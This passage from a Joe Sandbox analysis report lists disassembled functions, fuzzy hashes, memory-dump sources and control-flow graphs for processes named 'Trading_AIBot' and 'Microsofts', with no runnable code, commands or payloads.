                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: cd1f4ad2126aa049c6bf7c25eecaa99b0429bbb397134cc273b4aa6503a9a1d6
                                                                                                                                        • Instruction ID: 72cd5a4ee37bd7f2046395517d030a301b0cc0d181fc346e7218b3b621ae9d65
                                                                                                                                        • Opcode Fuzzy Hash: cd1f4ad2126aa049c6bf7c25eecaa99b0429bbb397134cc273b4aa6503a9a1d6
                                                                                                                                        • Instruction Fuzzy Hash: A2219D71C052458FE701AFB4D9993AE7FB0FB0A305F4458E6C095A7191DB784686CF91
                                                                                                                                        Function 02B05238 Relevance: .0, Instructions: 44COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: dc53d51e06836c60ef83a2445baf03a5a600d8a2c4a21a88296869b5d85924af
                                                                                                                                        • Instruction ID: c6a4aac984395dac79a6d0355a5c32e77f353ebb08641307f94c4bcc49d1a625
                                                                                                                                        • Opcode Fuzzy Hash: dc53d51e06836c60ef83a2445baf03a5a600d8a2c4a21a88296869b5d85924af
                                                                                                                                        • Instruction Fuzzy Hash: 05010470C51219DFEB04AFB4D5583AEBFB0EB0A306F5498AA9455A32C0DB784684CF91
                                                                                                                                        Function 02B06C3E Relevance: .0, Instructions: 30COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: dbf5c6cd02d46b644ecc1b5209ad65767f55e48e1d84f43cba174a758eb62a1b
                                                                                                                                        • Instruction ID: 6a6e1efb793ffb5e7dbc8f587b14a572e516f3040eb7ce0e4b1cb80fd77f8d57
                                                                                                                                        • Opcode Fuzzy Hash: dbf5c6cd02d46b644ecc1b5209ad65767f55e48e1d84f43cba174a758eb62a1b
                                                                                                                                        • Instruction Fuzzy Hash: 81F0F875D002558FDB64DFA4E4986ACBFB0EF5A312F0064A6E409A32A0CB309995CF24
                                                                                                                                        Function 02B073A0 Relevance: .0, Instructions: 27COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: aa48ac9b4bfb28b24e7a053e0ee774abf0aa47a7ec3ea51ecfee5eaf981b89fb
                                                                                                                                        • Instruction ID: e0fbead69714a7a78818ac595fb1c9bf756b20e2977bf3b1621c737c2246bb6d
                                                                                                                                        • Opcode Fuzzy Hash: aa48ac9b4bfb28b24e7a053e0ee774abf0aa47a7ec3ea51ecfee5eaf981b89fb
                                                                                                                                        • Instruction Fuzzy Hash: 22F0E576900204DFD700EFB8D849B6DBFB4FB09705F504199E848E3361EB309981CB80
                                                                                                                                        Function 02B06757 Relevance: .0, Instructions: 24COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 92abed16cd5f5dbe7617219e3bf1da9c38e74e1b220a423af3dea2de351ef42e
                                                                                                                                        • Instruction ID: d99cc9caae4e97883dbecd73047493b8f118ade2c13425d8f9abba3f739314be
                                                                                                                                        • Opcode Fuzzy Hash: 92abed16cd5f5dbe7617219e3bf1da9c38e74e1b220a423af3dea2de351ef42e
                                                                                                                                        • Instruction Fuzzy Hash: 7CE02271905288DFEB02EFB4DA156DDBFB4EB16204F0048EAE849A3280DF301F44CB92
                                                                                                                                        Function 02B073B0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d35dc724902f7e7d70546c0c914650ef698a0943656dfc06e5e6463fb2c7d1f4
                                                                                                                                        • Instruction ID: 91fda071f3e9c6d7182782e3353d0253d5c5f999b97ed03b18579e99d0ef0cad
                                                                                                                                        • Opcode Fuzzy Hash: d35dc724902f7e7d70546c0c914650ef698a0943656dfc06e5e6463fb2c7d1f4
                                                                                                                                        • Instruction Fuzzy Hash: 15E01A75910208DFD744EFB8E888A59BBB4FB09705F5041A9E809A33A4EB30A985CB90
                                                                                                                                        Function 02B06768 Relevance: .0, Instructions: 20COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b714bcb3db38bd33b7c210e15323799cbee16860e73681e97cb7249e9714c9c1
                                                                                                                                        • Instruction ID: 6fbfbb19c0e1d63eecbb3f49108e5612d3095308aa7e50fd2e171002bae0c65e
                                                                                                                                        • Opcode Fuzzy Hash: b714bcb3db38bd33b7c210e15323799cbee16860e73681e97cb7249e9714c9c1
                                                                                                                                        • Instruction Fuzzy Hash: 08E08671941208DFEB00EFB5D645A9DB7B5EB05304F5088A9D409B3254DF751E04CB91
                                                                                                                                        Function 02B07548 Relevance: .0, Instructions: 17COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e7876b1afd0204c8e054d463a770f03125f0725252e41d77169bd69b0621cdfb
                                                                                                                                        • Instruction ID: a2461855330d4856f88c8687a051a08f4f70c6b750d5874dcec302d76e8646f6
                                                                                                                                        • Opcode Fuzzy Hash: e7876b1afd0204c8e054d463a770f03125f0725252e41d77169bd69b0621cdfb
                                                                                                                                        • Instruction Fuzzy Hash: 63D05E72904344AFEB01DBB5A80A7AABF78E703741F4408D9E44872242EF659555C695
                                                                                                                                        Function 02B06D40 Relevance: .0, Instructions: 17COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: df26d7239822d9dcc74bc8b2f01780e93685845d192b031cc60e177fe7ce6f4d
                                                                                                                                        • Instruction ID: 6b5d5aceedfa927294917711db4e4b38e6c88edb6e161c19e51874621d93f6fd
                                                                                                                                        • Opcode Fuzzy Hash: df26d7239822d9dcc74bc8b2f01780e93685845d192b031cc60e177fe7ce6f4d
                                                                                                                                        • Instruction Fuzzy Hash: 3FD05E628042855FE245ABA4A905755BF78E71220AF0805A8E44872146DB65819086D5
                                                                                                                                        Function 02B07558 Relevance: .0, Instructions: 13COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5b7fa67665a6677520baa165ce476fd662c6c85ea44af2f346187e1a519ae228
                                                                                                                                        • Instruction ID: 792d766e7109d421a0d6a8cd89557af25524d7ea9a5940b3466d285cb2331e23
                                                                                                                                        • Opcode Fuzzy Hash: 5b7fa67665a6677520baa165ce476fd662c6c85ea44af2f346187e1a519ae228
                                                                                                                                        • Instruction Fuzzy Hash: 2BC01270D113089FE600DAA4E805759FA6CF706706F400595A408632809F715450C695
                                                                                                                                        Function 02B06D50 Relevance: .0, Instructions: 13COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.23336419135.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_2b00000_Trading_AIBot.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b056ca77a1394981c4bb99b0f46e05ff4134309018f0e0e731723c3a5c28ecba
                                                                                                                                        • Instruction ID: f782c2a75e59f91f33ef07f21dec83df2c097369fb5e066b93775a17d01b533c
                                                                                                                                        • Opcode Fuzzy Hash: b056ca77a1394981c4bb99b0f46e05ff4134309018f0e0e731723c3a5c28ecba
                                                                                                                                        • Instruction Fuzzy Hash: 66C012308012489BE614AB95A405B15BB6CE706306F0001A9E50862144DB71449086A5

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:14.3%
                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:57
                                                                                                                                        Total number of Limit Nodes:8
                                                                                                                                        execution_graph 21182 ea46d8 21185 ea46e4 21182->21185 21183 ea4713 21186 ea9249 21185->21186 21187 ea9264 21186->21187 21194 ea946f 21187->21194 21201 ea9480 21187->21201 21188 ea9270 21208 52183f1 21188->21208 21212 5218400 21188->21212 21189 ea929a 21189->21183 21195 ea9480 21194->21195 21196 ea956e 21195->21196 21216 5210dcc 21195->21216 21222 52109e8 21195->21222 21230 52107c8 21195->21230 21237 52107b8 21195->21237 21196->21188 21202 ea94a2 21201->21202 21203 ea956e 21202->21203 21204 52107b8 4 API calls 21202->21204 21205 52107c8 2 API calls 21202->21205 21206 52109e8 4 API calls 21202->21206 21207 5210dcc 3 API calls 21202->21207 21203->21188 21204->21203 21205->21203 21206->21203 21207->21203 21209 5218400 21208->21209 21210 52109e8 4 API calls 21209->21210 21211 5218534 21209->21211 21210->21211 21211->21189 21213 5218422 21212->21213 21214 52109e8 4 API calls 21213->21214 21215 5218534 21213->21215 21214->21215 21215->21189 21220 5210c83 21216->21220 21217 5210dc4 LdrInitializeThunk 21219 5210f21 21217->21219 21219->21196 21220->21217 21221 52107c8 2 API calls 21220->21221 21221->21220 21223 5210a19 LdrInitializeThunk 21222->21223 21229 5210ab9 21223->21229 21225 5210b79 21225->21196 21226 5210dc4 LdrInitializeThunk 21226->21225 21228 52107c8 2 API calls 21228->21229 21229->21225 21229->21226 21229->21228 21231 52107da 21230->21231 21232 52107df 21230->21232 21231->21196 21232->21231 21233 5210a28 LdrInitializeThunk 21232->21233 21235 5210ab9 21233->21235 21234 5210b79 21234->21196 21235->21234 21236 5210f09 LdrInitializeThunk 21235->21236 21236->21234 21240 52107c8 21237->21240 21238 52107da 21238->21196 21239 5210a28 LdrInitializeThunk 21244 5210ab9 21239->21244 21240->21238 21240->21239 21241 5210b79 21241->21196 21242 5210dc4 LdrInitializeThunk 21242->21241 21244->21241 21244->21242 21245 52107c8 2 API calls 21244->21245 21245->21244 21246 52110a8 21247 52110bf 21246->21247 21249 52110c5 21246->21249 21248 52107c8 2 API calls 21247->21248 21247->21249 21251 5211446 21247->21251 21248->21251 21250 52107c8 2 API calls 21250->21251 21251->21249 21251->21250

                                                                                                                                        Executed Functions

                                                                                                                                        Function 00EAC130 Relevance: 4.3, Strings: 1, Instructions: 3069COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: N
                                                                                                                                        • API String ID: 0-1130791706
                                                                                                                                        • Opcode ID: b7e91a5b818d64f605743294a549fe4644ee7991b92d1e3a602d134485eabdde
                                                                                                                                        • Instruction ID: ac3e53ffa2898df2348ab44e51b48ca049babaaa3b46e21d85ed81f9170445db
                                                                                                                                        • Opcode Fuzzy Hash: b7e91a5b818d64f605743294a549fe4644ee7991b92d1e3a602d134485eabdde
                                                                                                                                        • Instruction Fuzzy Hash: 3F73F631C10B5A8EDB11EF68C844A99F7B1FF99300F51D69AE4597B221EB70AAC4CF41
                                                                                                                                        Function 052107C8 Relevance: 3.5, APIs: 2, Instructions: 529libraryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1362 52107c8-52107d8 1363 52107da 1362->1363 1364 52107df-52107eb 1362->1364 1365 521090b-5210915 1363->1365 1367 52107f2-5210807 1364->1367 1368 52107ed 1364->1368 1371 521091b-521095b 1367->1371 1372 521080d-5210818 1367->1372 1368->1365 1389 5210962-52109d8 1371->1389 1375 5210916 1372->1375 1376 521081e-5210825 1372->1376 1375->1371 1378 5210852-521085d 1376->1378 1379 5210827-521083e 1376->1379 1383 521086a-5210874 1378->1383 1384 521085f-5210867 1378->1384 1379->1389 1390 5210844-5210847 1379->1390 1391 521087a-5210884 1383->1391 1392 52108fe-5210903 1383->1392 1384->1383 1419 5210a28-5210ab4 LdrInitializeThunk 1389->1419 1420 52109da-5210a17 1389->1420 1390->1375 1394 521084d-5210850 1390->1394 1391->1375 1399 521088a-52108a6 1391->1399 1392->1365 1394->1378 1394->1379 1404 52108a8 1399->1404 1405 52108aa-52108ad 1399->1405 1404->1365 1406 52108b4-52108b7 1405->1406 1407 52108af-52108b2 1405->1407 1409 52108ba-52108c8 1406->1409 1407->1409 1409->1375 1413 52108ca-52108d1 1409->1413 1413->1365 1414 52108d3-52108d9 1413->1414 1414->1375 1416 52108db-52108e0 1414->1416 1416->1375 1417 52108e2-52108f5 1416->1417 1417->1375 1425 52108f7-52108fa 1417->1425 1424 5210b53-5210b59 1419->1424 1422 5210a19 1420->1422 1423 5210a1e-5210a25 1420->1423 1422->1423 1423->1419 1426 5210ab9-5210acc 1424->1426 1427 5210b5f-5210b77 1424->1427 1425->1414 1428 52108fc 1425->1428 1429 5210ad3-5210b24 1426->1429 1430 5210ace 1426->1430 1431 5210b79-5210b86 1427->1431 1432 5210b8b-5210b9e 1427->1432 1428->1365 1448 5210b37-5210b49 1429->1448 1449 5210b26-5210b34 1429->1449 1430->1429 1433 5210f21-521101f 1431->1433 1434 5210ba0 1432->1434 1435 5210ba5-5210bc1 1432->1435 1440 5211021-5211026 1433->1440 1441 5211027-5211031 1433->1441 1434->1435 1436 5210bc3 1435->1436 1437 5210bc8-5210bec 1435->1437 1436->1437 1444 5210bf3-5210c25 1437->1444 1445 5210bee 1437->1445 1440->1441 1454 5210c27 1444->1454 1455 5210c2c-5210c6e 1444->1455 1445->1444 1451 5210b50 1448->1451 1452 5210b4b 1448->1452 1449->1427 1451->1424 1452->1451 1454->1455 1457 5210c70 1455->1457 1458 5210c75-5210c7e 1455->1458 1457->1458 1459 5210ea6-5210eac 1458->1459 1460 5210c83-5210ca8 1459->1460 1461 5210eb2-5210ec5 1459->1461 1462 5210caa 1460->1462 1463 5210caf-5210ce6 1460->1463 1464 5210ec7 1461->1464 1465 5210ecc-5210ee7 1461->1465 1462->1463 1473 5210ce8 1463->1473 1474 5210ced-5210d1f 1463->1474 1464->1465 1466 5210ee9 1465->1466 1467 5210eee-5210f02 1465->1467 1466->1467 1471 5210f04 1467->1471 1472 5210f09-5210f1f LdrInitializeThunk 1467->1472 1471->1472 1472->1433 1473->1474 1476 5210d21-5210d46 1474->1476 1477 5210d83-5210d96 1474->1477 1478 5210d48 1476->1478 1479 5210d4d-5210d7b 1476->1479 1480 5210d98 1477->1480 1481 5210d9d-5210dc2 1477->1481 1478->1479 1479->1477 1480->1481 1484 5210dd1-5210e09 1481->1484 1485 5210dc4-5210dc5 1481->1485 1486 5210e10-5210e71 call 52107c8 1484->1486 1487 5210e0b 1484->1487 1485->1461 1493 5210e73 1486->1493 1494 5210e78-5210e9c 1486->1494 1487->1486 1493->1494 1497 5210ea3 1494->1497 1498 5210e9e 1494->1498 1497->1459 1498->1497
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24195607328.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_5210000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 2142ce2756f1c8c58a3d3e80cd1fcf3de3750f747584e94cf2702e4aa61542d4
                                                                                                                                        • Instruction ID: 8aee618173e07bd74201953ff6c27f88f8bbec937ca4270c38b48723f0ce8ee7
                                                                                                                                        • Opcode Fuzzy Hash: 2142ce2756f1c8c58a3d3e80cd1fcf3de3750f747584e94cf2702e4aa61542d4
                                                                                                                                        • Instruction Fuzzy Hash: D4224B70E112198FDB14DFA9C884B9EBBF2BF88304F1481A9D809AB355DB349D85CF94
                                                                                                                                        Function 052109E8 Relevance: 1.6, APIs: 1, Instructions: 88libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24195607328.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_5210000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: fc1da86d000f76d0e4180b843d3e0fd91d4c82eeb572a82135540ea504e71204
                                                                                                                                        • Instruction ID: 2a334c0a50cda1b55c11573a95f7d55bd8544883ca8f10eb38d1829efbf34623
                                                                                                                                        • Opcode Fuzzy Hash: fc1da86d000f76d0e4180b843d3e0fd91d4c82eeb572a82135540ea504e71204
                                                                                                                                        • Instruction Fuzzy Hash: 29311871D116189BEB18CFAAD9887DEFBF2BF89314F14C12AD418B72A4DB700545CB14
                                                                                                                                        Function 00EA9480 Relevance: .3, Instructions: 268COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6a4a304bfbe271239f99127b4761c69532ae29d5c713a268d7eb142258a097f8
                                                                                                                                        • Instruction ID: c47b82ecb5c5538d66eb15b14c8daa4b4c0ed6594c3918fdf2d5412d436c9a56
                                                                                                                                        • Opcode Fuzzy Hash: 6a4a304bfbe271239f99127b4761c69532ae29d5c713a268d7eb142258a097f8
                                                                                                                                        • Instruction Fuzzy Hash: 1AC1B178E00218CFDB54DFA5D944B9DBBB2BF89304F2085AAD809AB355DB359E85CF10
                                                                                                                                        Function 00EA9A30 Relevance: .2, Instructions: 226COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a691d001b2d8de2ac1e08ac8af5236baa1ce1ea59d9e959659202d9c26d43f5e
                                                                                                                                        • Instruction ID: f8a50091ae2024eaf9b95e486950b2ac17c4f5defab4c8de1817a112e51ff4a5
                                                                                                                                        • Opcode Fuzzy Hash: a691d001b2d8de2ac1e08ac8af5236baa1ce1ea59d9e959659202d9c26d43f5e
                                                                                                                                        • Instruction Fuzzy Hash: 57A11474D00608CFEB14DFA9C944BDDBBB1FF89304F209269E409AB2A6DB749984CF55
                                                                                                                                        Function 00EA9D87 Relevance: .2, Instructions: 202COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 032a27230364fd0a73ff511496abdce0391d1fd3050e8c61d2fd459f61f11014
                                                                                                                                        • Instruction ID: 0f5e9c6806f17b19c95c61ccaa192833b1d1a11bf67812a10140238bd382428a
                                                                                                                                        • Opcode Fuzzy Hash: 032a27230364fd0a73ff511496abdce0391d1fd3050e8c61d2fd459f61f11014
                                                                                                                                        • Instruction Fuzzy Hash: A191E174D00608CFEB14DFA8C548B9DBBF1BF89315F209269E409AB292DB75A984CF14
                                                                                                                                        Function 00EA946F Relevance: .1, Instructions: 101COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4b137e6bf35d6688438b7cd29de323f782e9702ab46ef062220eba22b86c60f4
                                                                                                                                        • Instruction ID: eca3cef76caaaf8271a73cc51126833d78d08bc45b00119421ec18879353e5cd
                                                                                                                                        • Opcode Fuzzy Hash: 4b137e6bf35d6688438b7cd29de323f782e9702ab46ef062220eba22b86c60f4
                                                                                                                                        • Instruction Fuzzy Hash: 6441E174E00208CBEB18CFAAD95469EFBF2BF89304F24D12AD815BB259EB345945CF50
                                                                                                                                        Function 00EAB100 Relevance: 6.6, Strings: 5, Instructions: 390COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 261 eab100-eab109 262 eab10b-eab110 261->262 263 eab112-eab115 261->263 266 eab14a-eab14d 262->266 264 eab11e-eab121 263->264 265 eab117-eab11c 263->265 267 eab12a-eab12d 264->267 268 eab123-eab128 264->268 265->266 269 eab12f-eab134 267->269 270 eab136-eab139 267->270 268->266 269->266 271 eab13b-eab140 270->271 272 eab142-eab145 270->272 271->266 273 eab14e-eab1be 272->273 274 eab147 272->274 281 eab1c3-eab1d2 call eab0a8 273->281 274->266 284 eab21b-eab21e 281->284 285 eab1d4-eab1ef 281->285 286 eab220-eab226 284->286 287 eab234-eab240 284->287 285->284 298 eab1f1-eab1f5 285->298 286->281 289 eab228 286->289 293 eab242-eab263 287->293 294 eab267-eab268 287->294 290 eab22a-eab231 289->290 295 eab26f-eab275 293->295 296 eab265 293->296 294->295 297 eab26a-eab26d 294->297 300 eab289-eab2bd call ea36d8 295->300 301 eab277-eab27a 295->301 296->294 297->295 299 eab2c0-eab318 297->299 302 eab1fe-eab207 298->302 303 eab1f7-eab1fc 298->303 310 eab31f-eab39f 299->310 301->300 304 eab27c-eab27e 301->304 302->284 305 eab209-eab212 302->305 303->290 304->300 307 eab280-eab283 304->307 305->284 308 eab214-eab219 305->308 307->300 307->310 308->290 329 eab3bf-eab415 310->329 330 eab3a1-eab3a5 310->330 336 eab420-eab429 329->336 337 eab417-eab41e 329->337 368 eab3a8 call eab469 330->368 369 eab3a8 call eab0ef 330->369 370 eab3a8 call eab49d 330->370 371 eab3a8 call eab100 330->371 372 eab3a8 call eab1a1 330->372 331 eab3ab-eab3bc 339 eab42b-eab432 336->339 340 eab434 336->340 338 eab43b-eab444 337->338 341 eab44a-eab467 338->341 342 eab4d8-eab4df call eab5ea 338->342 339->338 340->338 344 eab4e5-eab501 341->344 342->344 347 eab508-eab562 call ea36e8 344->347 348 eab503-eab506 344->348 349 eab56a-eab573 347->349 348->347 348->349 350 eab57a-eab5b0 349->350 351 eab575-eab578 349->351 354 eab5df-eab5e5 350->354 363 eab5b2-eab5d7 call ea36f8 350->363 351->350 351->354 363->354 368->331 369->331 370->331 371->331 372->331
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 8ar$H`r$H`r$H`r$TJar
                                                                                                                                        • API String ID: 0-1811950289
                                                                                                                                        • Opcode ID: 9d2d55eb4891ff86e77b4649e7425ad0086330258b9729f113ca36a5d511f232
                                                                                                                                        • Instruction ID: 64308fec62bd27080c003036a5aecd8e1dcc3a794b73478f420e1bf8b6eaf05d
                                                                                                                                        • Opcode Fuzzy Hash: 9d2d55eb4891ff86e77b4649e7425ad0086330258b9729f113ca36a5d511f232
                                                                                                                                        • Instruction Fuzzy Hash: 16D1E571B002048FDB15DB68D451BAE7BB2EF8E320F245166E505EF3A2DB35ED418BA1
                                                                                                                                        Function 00EA3F78 Relevance: 6.4, Strings: 5, Instructions: 125COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 374 ea3f78-ea3fa2 375 ea3fa9-ea4022 call ea3168 374->375 376 ea3fa4 374->376 382 ea4028-ea4061 375->382 376->375 385 ea40af-ea40c6 382->385 387 ea40c8-ea40ed 385->387 388 ea4063-ea4073 385->388 394 ea40ef-ea4104 387->394 395 ea4105 387->395 392 ea4094 388->392 393 ea4075-ea407e 388->393 398 ea4097-ea40ae 392->398 396 ea4080-ea4083 393->396 397 ea4085-ea4088 393->397 394->395 399 ea4092 396->399 397->399 398->385 399->398
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.24169481432.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_ea0000_Microsofts.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
